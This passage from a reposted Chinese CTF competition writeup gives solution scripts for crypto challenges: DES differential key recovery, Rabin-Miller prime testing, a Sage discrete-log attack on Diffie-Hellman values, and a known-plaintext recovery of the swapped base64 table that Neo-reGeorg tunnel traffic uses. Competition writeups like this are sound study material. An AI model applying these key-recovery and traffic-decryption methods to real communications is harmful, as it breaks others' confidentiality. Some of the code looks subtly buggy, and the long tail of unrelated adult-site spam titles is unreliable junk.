      4, 3, 2, 12, 9, 5, 15, 10, 11, 14, 1, 7, 6, 0, 8, 13]
S7 = [4, 11, 2, 14, 15, 0, 8, 13, 3, 12, 9, 7, 5, 10, 6, 1,
      13, 0, 11, 7, 4, 9, 1, 10, 14, 3, 5, 12, 2, 15, 8, 6,
      1, 4, 11, 13, 12, 3, 7, 14, 10, 15, 6, 8, 0, 5, 9, 2,
      6, 11, 13, 8, 1, 4, 10, 7, 9, 5, 0, 15, 14, 2, 3, 12]
S8 = [13, 2, 8, 4, 6, 15, 11, 1, 10, 9, 3, 14, 5, 0, 12, 7,
      1, 15, 13, 8, 10, 3, 7, 4, 12, 5, 6, 11, 0, 14, 9, 2,
      7, 11, 4, 1, 9, 12, 14, 2, 0, 6, 10, 13, 15, 3, 5, 8,
      2, 1, 14, 7, 4, 10, 8, 13, 15, 12, 9, 0, 3, 5, 6, 11]
S_list = [S1, S2, S3, S4, S5, S6, S7, S8]

#S盒置換
def s_box_replace(xor_list_key):
    result = []
    for i in range(8):
        row = int(xor_list_key[i * 6] + xor_list_key[i * 6 + 5], 2)
        column = int(xor_list_key[i * 6 + 1] + xor_list_key[i * 6 + 2] + xor_list_key[i * 6 + 3] + xor_list_key[i * 6 + 4], 2)
        s_result=S_list[i][row*16+column]
        num = bin(s_result)[2:].zfill(4)
        result.extend(num)
    return result

def _s_box_replace(new_p_box_list):
    result = [[[],[],[],[]],
              [[],[],[],[]],
              [[],[],[],[]],
              [[],[],[],[]],
              [[],[],[],[]],
              [[],[],[],[]],
              [[],[],[],[]],
              [[],[],[],[]]]
    for i in range(8):
         sp = [0,0,0,0]
         sp[0] = S_list[i].index((new_p_box_list[i][0] * 2**3 + new_p_box_list[i][1] * 2**2 + new_p_box_list[i][2] * 2**1 + new_p_box_list[i][3] * 2**0),0,16)
         sp[1] = S_list[i].index((new_p_box_list[i][0] * 2**3 + new_p_box_list[i][1] * 2**2 + new_p_box_list[i][2] * 2**1 + new_p_box_list[i][3] * 2**0),16,32)
         sp[2] = S_list[i].index((new_p_box_list[i][0] * 2**3 + new_p_box_list[i][1] * 2**2 + new_p_box_list[i][2] * 2**1 + new_p_box_list[i][3] * 2**0),32,48)
         sp[3] = S_list[i].index((new_p_box_list[i][0] * 2**3 + new_p_box_list[i][1] * 2**2 + new_p_box_list[i][2] * 2**1 + new_p_box_list[i][3] * 2**0),48,64)
         for j in range(4):
            row = [0,0,0,0]
            clum = [0,0,0,0]
            row[j]= int(sp[j]) // 16
            clum[j] = int(sp[j]) % 16
            _num1 = [0,0]
            _num2 = [0,0,0,0]
            _num1 = bin(clum[j])[2:].zfill(2)
            _num2 = bin(clum[j])[2:].zfill(4)
            result[i][j] =[int(_num1[0]),int(_num2[0]),int(_num2[1]),int(_num2[2]),int(_num2[3]),int(_num1[1])]
    return result

#p盒置換
p_box = [16, 7, 20, 21, 29, 12, 28, 17,
        1, 15, 23, 26, 5, 18, 31, 10,
        2, 8, 24, 14, 32, 27, 3, 9,
        19, 13, 30, 6, 22, 11, 4, 25]
_p_box = [9,17,23,31,13,28,2,18,
          24,16,30,6,26,20,10,1,
          8,14,25,3,4,29,11,19,
          32,12,22,7,5,27,15,21]

def p_box_replace(str):
    result = [0] * 32
    for i in range(32):
        result[i] = str[p_box[i] - 1]
    return result
def _p_box_replace(str):
    result = [0] * 32
    for i in range(32):
        result[i] = str[_p_box[i] - 1]
    return result

def key_poss(plaintext, miwen, shu):
    #print("明文", shu, ":", plaintext)
    # #print("密鑰:",key_table)
    #將明文和密鑰16進(jìn)制字符串轉(zhuǎn)為2進(jìn)制列表
    plaintext_result = hex_to_binary(plaintext)
    miwen_result = hex_to_binary(miwen)
    #將明文和密鑰2進(jìn)制字符列表轉(zhuǎn)為2進(jìn)制整型列表
    plaintext_result_int = list(map(int,plaintext_result))
    miwen_result_int =list(map(int,miwen_result))
    #對(duì)明文做初始置換
    initial_table=substitution(plaintext_result_int)
    initial_str=binary_to_hexadecimal(list(map(str,initial_table)))
    #print("明文", shu, "的初始置換:",initial_str)
    L_list = [initial_table[i] for i in range(32)]
    R_list = [initial_table[i] for i in range(32,64)]
    #print("明文", shu, "的R邊:", R_list)
    # L_new_list=R_list
    #進(jìn)行擴(kuò)展置換
    extend_list=extend_replacement(R_list)
    # #print (extend_list)
    new_extend_list= [[extend_list[i] for i in range(0, 6)],
                      [extend_list[i] for i in range(6, 12)],
                      [extend_list[i] for i in range(12, 18)],
                      [extend_list[i] for i in range(18, 24)],
                      [extend_list[i] for i in range(24, 30)],
                      [extend_list[i] for i in range(30, 36)],
                      [extend_list[i] for i in range(36, 42)],
                      [extend_list[i] for i in range(42, 48)]]
    #print("明文", shu, "的擴(kuò)展置換:", new_extend_list)

    #miwen caozuo
    #IP ni zhihuan
    _IP_table = reverse_substitution(miwen_result_int)
    _IP__str = binary_to_hexadecimal(list(map(str, _IP_table)))
    # #print(_IP__str)
    #miwen L R
    _L_list = [_IP_table[i] for i in range(32)]
    _R_list = [_IP_table[i] for i in range(32, 64)]
    _r_list_new = xor(_R_list, L_list)
    #_P zhihuan
    _p_box_list=_p_box_replace(_r_list_new)
    new_p_box_list = [[_p_box_list[i] for i in range(0, 4)],
                      [_p_box_list[i] for i in range(4, 8)],
                      [_p_box_list[i] for i in range(8, 12)],
                      [_p_box_list[i] for i in range(12, 16)],
                      [_p_box_list[i] for i in range(16, 20)],
                      [_p_box_list[i] for i in range(20, 24)],
                      [_p_box_list[i] for i in range(24, 28)],
                      [_p_box_list[i] for i in range(28, 32)],]
    # #print(new_p_box_list)
    s_in = [[[],[],[],[]],
         [[],[],[],[]],
         [[],[],[],[]],
         [[],[],[],[]],
         [[],[],[],[]],
         [[],[],[],[]],
         [[],[],[],[]],
         [[],[],[],[]]]
    for i in range(8):
        for j in range(4):
            sp = [[0, 0, 0, 0], [0, 0, 0, 0], [0, 0, 0, 0], [0, 0, 0, 0], [0, 0, 0, 0], [0, 0, 0, 0], [0, 0, 0, 0],
                  [0, 0, 0, 0]]
            t = new_p_box_list[i][0] * 2 ** 3 + new_p_box_list[i][1] * 2 ** 2 + new_p_box_list[i][2] * 2 ** 1 + \
                new_p_box_list[i][3] * 2 ** 0
            sp[i][0] = S_list[i].index(t, 0, 16)
            #print(sp[0])
            sp[i][1] = S_list[i].index(t, 16, 32)
            sp[i][2] = S_list[i].index(t, 32, 48)
            sp[i][3] = S_list[i].index(t, 48, 64)
            row = [[0, 1, 2, 3], [0, 1, 2, 3], [0, 1, 2, 3], [0, 1, 2, 3], [0, 1, 2, 3], [0, 1, 2, 3], [0, 1, 2, 3],
                   [0, 1, 2, 3]]
            clum = [[0, 0, 0, 0], [0, 0, 0, 0], [0, 0, 0, 0], [0, 0, 0, 0], [0, 0, 0, 0], [0, 0, 0, 0], [0, 0, 0, 0],
                    [0, 0, 0, 0]]
            # row[i][0]= 0
            # #print(row[i])
            clum[i][j] = (int(sp[i][j]) % 16)
            _num1 = [[0, 0], [0, 0], [0, 0], [0, 0], [0, 0], [0, 0], [0, 0], [0, 0]]
            _num2 = [[0, 0, 0, 0], [0, 0, 0, 0], [0, 0, 0, 0], [0, 0, 0, 0], [0, 0, 0, 0], [0, 0, 0, 0], [0, 0, 0, 0],
                     [0, 0, 0, 0]]
            _num1[i] = bin(row[i][j])[2:].zfill(2)
            _num2[i] = bin(clum[i][j])[2:].zfill(4)
            s_in[i][j] = [int(_num1[i][0]), int(_num2[i][0]), int(_num2[i][1]), int(_num2[i][2]), int(_num2[i][3]),
                            int(_num1[i][1])]
        # return result
    # #print(s_in)
    key_possible = [
        [[0,0,0,0,0,0],[0,0,0,0,0,0],[0,0,0,0,0,0],[0,0,0,0,0,0]],
        [[0,0,0,0,0,0],[0,0,0,0,0,0],[0,0,0,0,0,0],[0,0,0,0,0,0]],
        [[0,0,0,0,0,0],[0,0,0,0,0,0],[0,0,0,0,0,0],[0,0,0,0,0,0]],
        [[0,0,0,0,0,0],[0,0,0,0,0,0],[0,0,0,0,0,0],[0,0,0,0,0,0]],
        [[0,0,0,0,0,0],[0,0,0,0,0,0],[0,0,0,0,0,0],[0,0,0,0,0,0]],
        [[0,0,0,0,0,0],[0,0,0,0,0,0],[0,0,0,0,0,0],[0,0,0,0,0,0]],
        [[0,0,0,0,0,0],[0,0,0,0,0,0],[0,0,0,0,0,0],[0,0,0,0,0,0]],
        [[0,0,0,0,0,0],[0,0,0,0,0,0],[0,0,0,0,0,0],[0,0,0,0,0,0]]]
    for i in range(8):
        for j in range(4):
            for k in range(6):
                key_possible[i][j][k] = int(s_in[i][j][k]) ^ int(new_extend_list[i][k])
    return key_possible

key_real = [[0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0],
            [0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0]]
key1 = []
key2 = []
key3 = []
key4 = []
key5 = []
key6 = []
key7 = []
key8 = []

def cryptanalysis(key_poss1, key_poss2, key_poss3):
    for j in range(4):
        for k in range(4):
            if key_poss1[0][0] == key_poss2[0][j] == key_poss3[0][k] or key_poss1[0][1] == key_poss2[0][j] == \
                    key_poss3[0][k] or \
                    key_poss1[0][2] == key_poss2[0][j] == key_poss3[0][k] or key_poss1[0][3] == key_poss2[0][j] == \
                    key_poss3[0][k]:
                key1.append(key_poss2[0][j])
                # if len(key1) == 1:
                #print("key1:", key1)
            if key_poss1[1][0] == key_poss2[1][j] == key_poss3[1][k] or key_poss1[1][1] == key_poss2[1][j] == \
                    key_poss3[1][k] or \
                    key_poss1[1][2] == key_poss2[1][j] == key_poss3[1][k] or key_poss1[1][3] == key_poss2[1][j] == \
                    key_poss3[1][k]:
                key2.append(key_poss2[1][j])
                # if len(key2) == 1:
                #print("key2:", key2)
            if key_poss1[2][0] == key_poss2[2][j] == key_poss3[2][k] or key_poss1[2][1] == key_poss2[2][j] == \
                    key_poss3[2][k] or key_poss1[2][2] == key_poss2[2][j] == key_poss3[2][k] or key_poss1[2][3] == \
                    key_poss2[2][j] == key_poss3[2][k]:
                key3.append(key_poss2[2][j])
                # if len(key3) == 1:
                #print("key3:", key3)
            if key_poss1[3][0] == key_poss2[3][j] == key_poss3[3][k] or key_poss1[3][1] == \
                    key_poss2[3][j] == key_poss3[3][k] or key_poss1[3][2] == key_poss2[3][j] == \
                    key_poss3[3][k] or key_poss1[3][3] == key_poss2[3][j] == key_poss3[3][k]:
                key4.append(key_poss2[3][j])
                # if len(key4) == 1:
                #print("key4:", key4)
            if key_poss1[4][0] == key_poss2[4][j] == key_poss3[4][k] or key_poss1[4][1] == \
                    key_poss2[4][j] == key_poss3[4][k] or key_poss1[4][2] == key_poss2[4][j] == key_poss3[4][k] \
                    or key_poss1[4][3] == key_poss2[4][j] == key_poss3[4][k]:
                key5.append(key_poss2[4][j])
                # if len(key5)==1:
                #print("key5:", key5)
            if key_poss1[5][0] == key_poss2[5][j] == key_poss3[5][k] or key_poss1[5][1] == \
                    key_poss2[5][j] == key_poss3[5][k] or key_poss1[5][2] == \
                    key_poss2[5][j] == key_poss3[5][k] or key_poss1[5][3] == \
                    key_poss2[5][j] == key_poss3[5][k]:
                key6.append(key_poss2[5][j])
                # if len(key6)==1:
                #print("key6:", key6)
            if key_poss1[6][0] == key_poss2[6][j] == key_poss3[6][k] or \
                    key_poss1[6][1] == key_poss2[6][j] == key_poss3[6][k] or \
                    key_poss1[6][2] == key_poss2[6][j] == key_poss3[6][k] or \
                    key_poss1[6][3] == key_poss2[6][j] == key_poss3[6][k]:
                key7.append(key_poss2[6][j])
                # if len(key7) == 1:
                #print("key7:", key7)
            if key_poss1[7][0] == key_poss2[7][j] == key_poss3[7][k] or \
                    key_poss1[7][1] == key_poss2[7][j] == key_poss3[7][k] or \
                    key_poss1[7][2] == key_poss2[7][j] == key_poss3[7][k] or \
                    key_poss1[7][3] == key_poss2[7][j] == key_poss3[7][k]:
                key8.append(key_poss2[7][j])
                #print("key8:", key8)
                #print("key zhaodaol")

    key_real[0] = key1[0]
    key_real[1] = key2[0]
    key_real[2] = key3[0]
    key_real[3] = key4[0]
    key_real[4] = key5[0]
    key_real[5] = key6[0]
    key_real[6] = key7[0]
    key_real[7] = key8[0]

if __name__ == '__main__':
    plaintext1 = "4845AB454511C0F0"
    miwen1 = "2EA85F08AA80C2D2"
    plaintext2 = "0123456789ABCDEF"
    miwen2 = "0293A8B9E45FCE5D"
    plaintext3 = "81120015A001FDF1"
    miwen3 = "E88382207800FE7A"

    plaintext1 = input("請(qǐng)輸入第一組明文:")
    miwen1 = input("請(qǐng)輸入第一組密文:")
    plaintext2 = input("請(qǐng)輸入第二組明文:")
    miwen2 = input("請(qǐng)輸入第一組密文:")
    plaintext3 = input("請(qǐng)輸入第三組明文:")
    miwen3 = input("請(qǐng)輸入第一組密文:")

    key_poss1 = key_poss(plaintext1, miwen1, 1)
    key_poss2 = key_poss(plaintext2, miwen2, 2)
    key_poss3 = key_poss(plaintext3, miwen3, 3)
    #print(key_poss1[0],key_poss2[0],key_poss3[0],sep='\n')
    cryptanalysis(key_poss1, key_poss2, key_poss3)

    # miyao = twoto16(key_real)
    print("經(jīng)過差分密碼分析得知,密鑰為:\n", key_real)
    # #print("miyao:",miyao)

24 素?cái)?shù)

難度:入門
該題主要考察大素?cái)?shù)檢測(cè)的知識(shí),根據(jù)費(fèi)馬小定理設(shè)計(jì)的rabin_Miller算法是效率最高的算法之一,雖然并不能100%保證通過檢測(cè)的數(shù)一定是素?cái)?shù)(比如561,偽質(zhì)數(shù)),但是再添加足夠多的底數(shù)后,是可以保證通過檢測(cè)的數(shù)絕大概率可用的(偽質(zhì)數(shù)出現(xiàn)概率大概為2的100次方分之一),該素性檢測(cè)算法現(xiàn)如今應(yīng)用于各類加密算法。順道一提,另一種可以確定性檢測(cè)素性(不會(huì)出現(xiàn)誤測(cè))的AKS素性檢測(cè)的基本理念也是費(fèi)馬小定理,只是在多項(xiàng)式的時(shí)間復(fù)雜度內(nèi)排除掉了被檢測(cè)數(shù)是所有種類的偽質(zhì)數(shù)的情況。
腳本如下:

import random
def rabin_miller(num):
    s = num - 1
    t = 0
    while s % 2 == 0:
        s = s // 2
        t += 1

    for trials in range(5):
        a = random.randrange(2, num - 1)
        v = pow(a, s, num)
        if v != 1:
            i = 0
            while v != (num - 1):
                if i == t - 1:
                    return False
                else:
                    i = i + 1
                    v = (v ** 2) % num
    return True
def is_prime(num):
    # 排除0,1和負(fù)數(shù)
    if num < 2:
        return False
    # 創(chuàng)建小素?cái)?shù)的列表,可以大幅加快速度
    # 如果是小素?cái)?shù),那么直接返回true
    small_primes = [2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37, 41, 43, 47, 53, 59, 61, 67, 71, 73, 79, 83, 89, 97, 101, 103, 107, 109, 113, 127, 131, 137, 139, 149, 151, 157, 163, 167, 173, 179, 181, 191, 193, 197, 199, 211, 223, 227, 229, 233, 239, 241, 251, 257, 263, 269, 271, 277, 281, 283, 293, 307, 311, 313, 317, 331, 337, 347, 349, 353, 359, 367, 373, 379, 383, 389, 397, 401, 409, 419, 421, 431, 433, 439, 443, 449, 457, 461, 463, 467, 479, 487, 491, 499, 503, 509, 521, 523, 541, 547, 557, 563, 569, 571, 577, 587, 593, 599, 601, 607, 613, 617, 619, 631, 641, 643, 647, 653, 659, 661, 673, 677, 683, 691, 701, 709, 719, 727, 733, 739, 743, 751, 757, 761, 769, 773, 787, 797, 809, 811, 821, 823, 827, 829, 839, 853, 857, 859, 863, 877, 881, 883, 887, 907, 911, 919, 929, 937, 941, 947, 953, 967, 971, 977, 983, 991, 997]
    if num in small_primes:
        return True
    # 如果大數(shù)是這些小素?cái)?shù)的倍數(shù),那么就是合數(shù),返回false
    for prime in small_primes:
        if num % prime == 0:
            return False
    # 如果這樣沒有分辨出來,就一定是大整數(shù),那么就調(diào)用rabin算法
    return rabin_miller(num)

# 得到大整數(shù),默認(rèn)位數(shù)為1024
def get_prime(key_size=1024):
    while True:
        num = random.randrange(2**(key_size-1), 2**key_size)
        if is_prime(num):
            return num
if __name__ == '__main__':
    print("print check number")
    a=input()
    a= int(a)
    if a > 0:
        print(is_prime(a))

25 鍵盤俠

根據(jù)給出的文字
對(duì)應(yīng)鍵盤上的按鍵畫圖案

對(duì)應(yīng)字符分別為
C L C K O U T H K
根據(jù)要求得到flag
flag{CLCKOUTHK}

26 silent_peeper

sage已經(jīng)封裝好了這個(gè)攻擊,得到a,b后算出key進(jìn)行AES解密即可

p = 174807157365465092731323561678522236549173502913317875393564963123330281052524687450754910240009920154525635325209526987433833785499384204819179549544106498491589834195860008906875039418684191252537604123129659746721614402346449135195832955793815709136053198207712511838753919608894095907732099313139446299843
g = 41899070570517490692126143234857256603477072005476801644745865627893958675820606802876173648371028044404957307185876963051595214534530501331532626624926034521316281025445575243636197258111995884364277423716373007329751928366973332463469104730271236078593527144954324116802080620822212777139186990364810367977
A = 142989488568573584455487421652639325256968267580899511353325709765313839485530879575182195391847106611058986646758739505820350416810754259522949402428485456431884223161690132385605038767582431070875138678612435983425500273038807582069763455994486365993366499478412783220052753597397455113133312907456163112016L
B = 16631700400183329608792112442038543911563829699195024819408410612490671355739728510944167852170853457830111233224257622677296345757516691802411264928943809622556723315310581871447325139349242754287009766402650270061476954875266747743058962546605854650101122523183742112737784691464177427011570888040416109544L
k = GF(p)
a = discrete_log_lambda(k(A),k(g),(2**39,2**40))
b = discrete_log_lambda(k(B),k(g),(2**39,2**40))
print(a)
print(b)

27 Neo-reGeorg

Neo-reGeorg 使用的一種簡(jiǎn)單的base64換表加密 這種方法在已知明文的時(shí)候十分脆弱
使用提供的日志很容易拼出第一個(gè)http請(qǐng)求的部分開頭明文(注意流量換行使用的是\n\r)

GET / HTTP/1.1
Host: 192.168.234.176
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0

使用base64編碼后與密文對(duì)比 可以還原出大部分映射表
剩余的少量映射關(guān)系可以通過爆破得出
拿到表后即可完整解密通信流量得到flag

原文:https://xz.aliyun.com/t/10642

總結(jié)

以上是生活随笔為你收集整理的2021年第一届 “东软杯”网络安全CTF竞赛官方WriteUp(转)的全部?jī)?nèi)容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯(cuò),歡迎將生活随笔推薦給好友。

91成人看片| 欧美综合久久久 | 久久成视频 | 狠狠干天天干 | www.久久视频 | 91在线公开视频 | 国产精品第2页 | 香蕉视频最新网址 | av官网在线 | 亚洲高清av | 五月天亚洲综合小说网 | 视频在线观看入口黄最新永久免费国产 | 天天操夜夜操天天射 | 永久免费毛片在线观看 | 午夜久久网 | 精品免费 | 国产日韩精品一区二区 | 涩涩网站在线看 | 国产自产高清不卡 | 国产小视频在线播放 | 亚洲精品乱码久久久久久蜜桃91 | 999成人国产 | 99热只有精品在线观看 | 中文在线8资源库 | 欧美夫妻生活视频 | 国产高清视频在线观看 | 97超碰色偷偷 | 欧美专区亚洲专区 | 亚洲国产免费网站 | 成 人 黄 色 视频免费播放 | 激情丁香综合五月 | 91成人免费在线视频 | 亚洲美女视频在线观看 | 国产精品原创av片国产免费 | 国产午夜精品福利视频 | 婷婷色在线资源 | 综合久久2023| 最近日本中文字幕 | 午夜久久美女 | 中文字幕国产精品一区二区 | 91.精品高清在线观看 | 在线国产不卡 | 91av欧美| 2019中文 | 日本精品视频免费 | www一起操 | 午夜成人免费电影 | 天天爽人人爽 | 在线观看国产永久免费视频 | 五月婷视频| 丰满少妇在线观看资源站 | 欧美精品久久久久性色 | а天堂中文最新一区二区三区 | 中文字幕在线观看第一页 | 久久av网 | 成人在线免费看视频 | 伊人色**天天综合婷婷 | 久草在线高清视频 | 久久综合给合久久狠狠色 | 久久久私人影院 | 精品国产乱子伦一区二区 | 91c网站色版视频 | 日韩精品一区二区三区在线视频 | 在线播放日韩av | 国产黄色片一级 | 国产精品免费大片视频 | 午夜精品久久久久久久久久久久 | 99热 精品在线| 91精品系列 | 国产精品麻豆免费版 | 探花视频在线版播放免费观看 | 黄色在线看网站 | 九九热免费精品视频 | 日韩国产精品久久 | 久久久久久亚洲精品 | 午夜的福利 | 色婷婷成人 | 高清av免费看 | 91久久国产综合精品女同国语 | 成人av午夜 | 97精品免费视频 | 久久综合久久久 | 又黄又爽免费视频 | 国产精品永久在线 | 91精品国产91p65 | 在线高清av | 免费欧美精品 | 久久国产精品影视 | 日韩理论在线 | 久久综合色天天久久综合图片 | 精品视频久久 | 亚洲视频在线观看网站 | 日日夜夜天天综合 | 久久成人综合视频 | 最近中文字幕高清字幕在线视频 | 国产精品亚洲精品 | 国产亚洲在 | 国产精品福利无圣光在线一区 | 高清一区二区三区 | 久久综合操 | 成人精品一区二区三区中文字幕 | 99精品视频中文字幕 | 99这里只有精品视频 | 国产黄免费在线观看 | 日产乱码一二三区别在线 | 欧美日韩另类在线观看 | 日韩欧美xxx | 97国产大学生情侣白嫩酒店 | 美女久久久 | 天天操天天摸天天干 | 丁香婷五月 | 色婷丁香 | 国产成人精品在线观看 | 麻豆影视网| 美女视频黄免费的久久 | 日韩二区在线播放 | caobi视频| 丁香婷婷基地 | 亚洲精品在线国产 | 黄色av免费| 九九热在线视频免费观看 | 欧美日韩免费一区 | 免费看高清毛片 | 97精品国自产拍在线观看 | 91精品啪在线观看国产 | 久久久久久久国产精品 | 欧美午夜精品久久久久 | 干干夜夜 | 免费看一级特黄a大片 | 国产日韩视频在线 | 国产精品精品国产色婷婷 | 国产中文视频 | 久久久久免费视频 | 中文字幕超清在线免费 | 韩国精品一区二区三区六区色诱 | 天堂网一区 | 91麻豆文化传媒在线观看 | 日日夜夜爱 | 国产一区播放 | 视频一区在线免费观看 | 国内精品久久久久影院男同志 | 亚洲春色成人 | 亚洲成人999 | 久久不卡日韩美女 | 天天在线操 | 91精品国产成人观看 | 男女全黄一级一级高潮免费看 | 国产精品久久久久免费 | 日本亚洲国产 | 欧美性脚交 | 麻豆视频在线 | 可以免费看av | 天天干人人干 | 人人澡澡人人 | 欧美激情精品久久久久久变态 | 日本性生活免费看 | 亚洲精品久久久蜜桃直播 | 97在线播放视频 | 在线免费观看麻豆视频 | 久久精品专区 | 欧美日韩啪啪 | 久久精品欧美视频 | 日本久久电影 | 九九免费在线看完整版 | 操操操干干干 | 欧美一区二区伦理片 | 欧美日韩在线播放一区 | 色婷婷一区| 欧美天天干 | 精品日韩中文字幕 | 少妇高潮流白浆在线观看 | 久久艹人人 | 精品国产成人av | 国产日韩视频在线 | 日日干天天 | 亚洲精品综合在线 | 一区二区三区精品在线视频 | 日韩高清国产精品 | 亚洲激情六月 | 天天干天天天天 | 成人免费在线播放视频 | 国产三级视频 | 一区二区三区在线观看中文字幕 | 日韩欧美在线观看一区二区 | 国产成人精品国内自产拍免费看 | 国产成人精品一区在线 | 免费在线播放视频 | 久久少妇免费视频 | 欧美人人爱 | 国产精品美女久久久久久久网站 | 天天在线操 | 久久视频免费 | 91麻豆精品国产91久久久使用方法 | 国产区免费在线 | 激情开心色 | 国产精品大片免费观看 | 欧美aaaxxxx做受视频 | 久在线| 国产精品美女久久久网av | 国产专区日韩专区 | 日韩欧美国产激情在线播放 | 国产视频不卡一区 | 国产精品日韩在线播放 | 在线观看黄色的网站 | 日韩欧美在线综合网 | 国产精品久久久久久久久久久久午夜片 | 黄色毛片一级片 | 五月天激情视频在线观看 | 亚洲成a人片77777潘金莲 | av成人免费 | 久久www免费人成看片高清 | 久久一区二 | 亚洲成色777777在线观看影院 | 亚洲精品午夜国产va久久成人 | 国内精品久久久久久久久久久久 | 色视频网址 | 高清精品视频 | 日本最大色倩网站www | 99久久综合国产精品二区 | 久久久久久国产精品免费 | www.久久com | 国产a级精品 | 日韩精品亚洲专区在线观看 | 免费麻豆视频 | 天天操天天干天天摸 | 久久视屏网 | 国产视频在线观看一区 | 国产99久久99热这里精品5 | 免费视频97| 成人毛片网 | 日韩欧美高清不卡 | 精品国产一区二区三区四区在线观看 | 国产高清成人av | www色,com | 福利视频一区二区 | 亚洲一区二区三区91 | 亚洲精品久久久久久久蜜桃 | 亚洲国产成人精品在线 | 午夜丁香视频在线观看 | 亚洲欧美日韩中文在线 | 亚洲精品国产精品国 | 国内精品美女在线观看 | 99精品电影 | 国产a级免费 | 青青草国产免费 | 日韩国产精品一区 | 国产精品美女久久久久aⅴ 干干夜夜 | 欧美成人h版在线观看 | 国产99久久九九精品免费 | 91精品啪在线观看国产81旧版 | 色福利网站 | 中文字幕视频免费观看 | 91亚洲精品久久久 | 93久久精品日日躁夜夜躁欧美 | 亚洲免费在线看 | 精品久久久久久国产91 | 久久久久久久久久久成人 | 免费观看v片在线观看 | 国产精品男女 | 久久成人国产精品免费软件 | 久草综合在线 | 免费在线91 | 韩日精品视频 | 日本aa在线 | 久久综合国产伦精品免费 | 国产高清免费av | 日日操夜夜操狠狠操 | 日本天天操 | 久久电影国产免费久久电影 | 亚洲午夜大片 | 久久久免费视频播放 | 亚洲高清色综合 | 精品免费久久久久 | 99色精品视频 | 色综合久久88色综合天天 | 亚洲午夜不卡 | 激情动态 | 婷婷丁香在线视频 | 日韩城人在线 | 中文资源在线观看 | av千婊在线免费观看 | 久久91网 | 国产91欧美 | 奇米影视四色8888 | 91资源在线播放 | 亚洲成人资源网 | 国产在线一卡 | 亚洲精品高清在线观看 | 91片黄在线观看动漫 | 国产区 在线 | 日韩av伦理片 | 综合色站导航 | 久久99这里只有精品 | 天天干,天天射,天天操,天天摸 | 成人观看视频 | 中文字幕色婷婷在线视频 | 亚洲国产播放 | 99精品在线观看视频 | 99c视频高清免费观看 | 久久综合加勒比 | 深爱激情婷婷网 | 亚洲精品乱码久久久久久蜜桃动漫 | 国产在线精品区 | 国产免费观看久久 | 97精品国产97久久久久久春色 | 久久久久久久久毛片 | 亚洲91精品 | 成人av网站在线观看 | 在线电影日韩 | 亚洲精品黄色片 | 97成人免费视频 | 久久精品国产成人 | 亚洲精品免费在线 | 久久伊人免费视频 | 五月天色丁香 | 免费亚洲视频在线观看 | 国产 成人 久久 | 69精品在线观看 | 亚洲三级影院 | 日本高清久久久 | 国产一级二级三级视频 | 欧美亚洲精品一区 | 欧美视频国产视频 | 日韩欧美精选 | 一二三久久久 | 伊人www22综合色 | 人人澡av| 欧美日韩在线视频一区 | 三级黄在线| 97国产精品免费 | 992tv又爽又黄的免费视频 | 国产最新在线视频 | 国产欧美在线一区 | 久久久久五月 | 奇米网444 | 亚洲色影爱久久精品 | 国产精品爽爽久久久久久蜜臀 | 亚洲国产999 | 日韩欧美在线免费观看 | 国产xxxxx在线观看 | 福利在线看片 | 久久视频在线 | 日日夜夜网 | 另类老妇性bbwbbw高清 | 日本系列中文字幕 | 国产黄色片网站 | 久久这里只有精品9 | 中文字幕一区二区三区四区久久 | 婷婷精品国产一区二区三区日韩 | 中文字幕观看视频 | 91精品视频免费看 | 欧美日韩在线电影 | 亚洲国产精品久久久久 | 超碰在线人 | 伊人狠狠色丁香婷婷综合 | 五月婷婷开心中文字幕 | 欧美最猛性xxx | 91精品国自产在线偷拍蜜桃 | 欧美ⅹxxxxxx| 久久96| 免费看的黄色 | 国产最新福利 | 久久免费av | 狠狠狠狠狠狠天天爱 | 精品国产中文字幕 | 黄色毛片大全 | 国产成人精品999在线观看 | 免费中文字幕 | 日日操狠狠干 | 狠狠色狠狠综合久久 | 丁香婷婷激情网 | 激情电影影院 | 美女视频黄色免费 | 亚洲免费公开视频 | 欧美精品九九99久久 | 久久免费电影网 | 亚洲精品一区二区三区新线路 | 西西大胆免费视频 | 高清精品视频 | 国产中文字幕一区二区三区 | 精品国产伦一区二区三区 | 国内久久精品视频 | 五月婷婷网站 | 久久精品国产成人精品 | 国产综合香蕉五月婷在线 | 天堂麻豆 | 久久国产精品免费 | 国产精品久久久久久欧美 | 免费日韩一区二区三区 | 天天射天天爱天天干 | 国产成人在线免费观看 | 成人a免费看 | 精品久久久久久久久久久久久久久久久久 | 午夜精品久久久久久久久久久久久久 | 亚洲人成网站精品片在线观看 | 久日视频 | 国产成人一区二区三区影院在线 | 日韩在线资源 | 在线亚洲精品 | 国产精品理论在线观看 | 日日摸日日添日日躁av | 国产精品99久久99久久久二8 | 欧美一级视频免费看 | 国内精品久久天天躁人人爽 | 六月激情久久 | 国产在线观看中文字幕 | 国产精品一区二区三区免费看 | 国产免费黄视频在线观看 | 日韩欧美高清在线观看 | 亚洲精品一区二区精华 | 免费在线电影网址大全 | 日韩免费观看一区二区 | 韩国av免费| 狠狠色丁香久久婷婷综合丁香 | 美女国产在线 | 伊人五月婷 | 国产在线 一区二区三区 | 久精品在线观看 | 福利视频 | 在线 视频 一区二区 | 最近高清中文字幕 | 日日操天天射 | 欧美日韩网址 | 男女啪啪网站 | 亚洲最新av在线网址 | 中文字幕中文字幕 | 狠狠干综合 | 色吊丝在线永久观看最新版本 | 中文字幕精品www乱入免费视频 | 国产精品免费久久久 | 在线观看黄网 | 在线免费成人 | 久久久久久在线观看 | 免费电影一区二区三区 | 亚洲第二色 | 日本在线观看黄色 | 午夜性生活片 | 国产精品久久久久久久久久久杏吧 | 亚洲最大成人免费网站 | 成人免费在线视频观看 | 99色免费 | aaa亚洲精品一二三区 | 久草久热 | 久久伊人精品一区二区三区 | 久久久久国产视频 | 日韩一区二区在线免费观看 | 亚洲欧美色婷婷 | 亚州黄色一级 | 999成人网| 超碰人人乐 | 久久九九免费视频 | 一级国产视频 | 亚洲精品美女久久久久网站 | 欧美一级视频免费 | 色欧美成人精品a∨在线观看 | 日韩高清免费在线 | 久久精品视频国产 | 四虎免费在线观看 | 